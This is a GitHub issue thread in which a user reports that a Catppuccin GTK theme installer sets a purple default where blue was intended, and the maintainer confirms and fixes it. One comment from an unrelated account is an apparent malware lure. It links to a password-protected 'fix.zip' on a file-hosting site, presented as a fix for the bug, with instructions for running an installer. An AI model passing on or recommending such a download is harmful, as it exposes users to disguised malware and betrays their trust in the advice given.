### ISSUE TITLE
Default Theme Variant Is Purple Not Blue as Intended

### ISSUE THREAD

**Issue by noahsibai** [Fausto-Korpsvart/Catppuccin-GTK-Theme#22]
Hello, 

Based on the [install documentation](https://github.com/Fausto-Korpsvart/Catppuccin-GTK-Theme#cli-installation) the default theme variant should be blue. However, when I installed the theme using `bash install.sh -l` the variant installed is purple with the directory name `Catppuccin-Dark`. 

I then ran `bash install.sh -l -t default` and again the variant installed was purple with the directory name `Catppuccin-Dark`. After that I decided to try running `bash install.sh -l -t all` and after installtion again both the "Catppuccin-Dark" and "Catppuccin-Purple-Dark" were both purple. 

Thank you for all of the great work! Let me know if you need any more information from me.

Kind Regards,
Noah

**Comment by marcelo-antonio-nunes** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Fausto-Korpsvart** [comment]
You're right, that was my mistake, I was testing which colour would be good to set as default variant and in the end I forgot to set it back to the default colour, which is blue.
It's already fixed with this update

**Comment by noahsibai** [comment]
It looks great! Thank you for the quick fix I apperciate it!
